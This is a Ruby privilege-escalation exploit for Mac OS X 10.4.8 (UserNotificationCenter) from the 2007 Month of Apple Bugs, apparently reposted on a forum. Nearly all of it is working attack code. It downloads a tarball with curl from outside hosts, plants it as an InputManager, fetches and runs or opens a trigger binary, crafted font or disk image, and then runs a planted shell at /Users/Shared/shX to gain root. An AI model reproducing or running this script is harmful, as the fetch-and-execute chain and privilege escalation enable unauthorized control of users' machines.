Mac OS X 10.4.8 (UserNotificationCenter) Privilege Escalation Exploit
[code]#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#
require 'fileutils'
bugselected = (ARGV[0] || 0).to_i
# INPUTMANAGER_URL = "[url]http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz[/url]"
# keeping a local backup. /str0ke
INPUTMANAGER_URL = "[url]http://www.milw0rm.com/sploits/MOAB-22-01-2007_im.tar.gz[/url]"
INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
"mkdir -p ~/Library/InputManagers/;" +
"cd ~/Library/InputManagers/;" +
"tar -zxvf /tmp/moab_im.tar.gz"
case bugselected
when 0
target_url = "[url]http://projects.info-pull.com/moab/bug-files/notification[/url]"
trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
when 1
target_url = "[url]http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf[/url]"
trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
when 2
target_url = "[url]http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz[/url]"
trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
end
CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"
def escalate()
puts "++ Welcome to Pwndertino..."
system CMD_LINE
sleep 5
system "/Users/Shared/shX"
end
escalate()
[/code]
页:
[1]